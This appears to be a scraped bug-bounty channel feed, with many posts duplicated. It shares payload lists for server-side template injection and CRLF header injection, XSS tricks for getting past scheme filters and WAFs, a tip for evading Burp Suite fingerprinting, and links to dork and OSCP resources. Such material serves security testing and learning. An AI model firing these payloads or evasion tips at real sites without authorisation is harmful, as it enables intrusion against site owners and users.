https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation
Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
portswigger.net
TLS settings - PortSwigger
The TLS settings enable you to configure: TLS negotiation. Client TLS certificates. Server TLS certificates. Java TLS settings. TLS negotiation These ...
π3
Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
πΉ{7*7}
πΉ*{7*7}
πΉ{{7*7}}
πΉ[[7*7]]
πΉ${7*7}
πΉ@(7*7)
πΉ<?=7*7?>
πΉ<%= 7*7 %>
πΉ${= 7*7}
πΉ{{= 7*7}}
πΉ${{7*7}}
πΉ#{7*7}
πΉ[=7*7]
If evaluated as 49 - the target is vulnerable
SSTI (Server Side Template Injection) Payload List
πΉ{7*7}
πΉ*{7*7}
πΉ{{7*7}}
πΉ[[7*7]]
πΉ${7*7}
πΉ@(7*7)
πΉ<?=7*7?>
πΉ<%= 7*7 %>
πΉ${= 7*7}
πΉ{{= 7*7}}
πΉ${{7*7}}
πΉ#{7*7}
πΉ[=7*7]
If evaluated as 49 - the target is vulnerable
π11
Bug Bounty Tip
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
πΉ%0a
πΉ%0d
πΉ%E2%80%A8
πΉ%E2%80%A9
β javascript://test.com%0aalert(1)
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
πΉ%0a
πΉ%0d
πΉ%E2%80%A8
πΉ%E2%80%A9
β javascript://test.com%0aalert(1)
π13β€1
CRLF Payload List
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
π12β€1
Bug Bounty Reminder
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
π23β€5π₯2
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
GitHub
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
β€3π3
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
GitHub
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
π5β€1
Mindmap/Google Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks
https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks
GitHub
Mindmap/Google Dorks at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
β€4π2
Bugcrowd-Vulnerability-Rating-Taxonomy-1.8.pdf
240.2 KB
Bugcrowd-Vulnerability-Rating-Taxonomy-1.8.pdf
β€9π3
WhatsApp'ta Cyber Security kanalΔ±nΔ± takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q
WhatsApp.com
Cyber Security
Channel β’ 386 followers
π4β€2π€2π1
GitHub - fr0gger/Awesome-GPT-Agents: A curated list of GPT agents for cybersecurity
https://github.com/fr0gger/Awesome-GPT-Agents
https://github.com/fr0gger/Awesome-GPT-Agents
GitHub
GitHub - fr0gger/Awesome-GPT-Agents: A curated list of GPT agents for cybersecurity
A curated list of GPT agents for cybersecurity. Contribute to fr0gger/Awesome-GPT-Agents development by creating an account on GitHub.
π5β€2
Having some fun with JavaScript hoisting - Johan Carlsson
https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
Johan Carlsson
Having fun with JavaScript hoisting
Writeup of three JavaScript challenges posted on Twitter during November/December of 2023
HTTP Host Header Attack
https://www.saygili.org/2020/11/http-host-header-attack.html
https://www.saygili.org/2020/11/http-host-header-attack.html
Erhan SAYGILI
HTTP Host Header Attack
π1
Cross-Site Request Forgery
https://www.saygili.org/2020/11/cross-site-request-forgery.html
https://www.saygili.org/2020/11/cross-site-request-forgery.html
Erhan SAYGILI
Cross-Site Request Forgery
π€5π2π1
GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
https://github.com/rodolfomarianocy/OSCP-Tricks-2023
https://github.com/rodolfomarianocy/OSCP-Tricks-2023
GitHub
GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines - rodolfomarianocy/OSCP-Tricks-2023
π₯7π1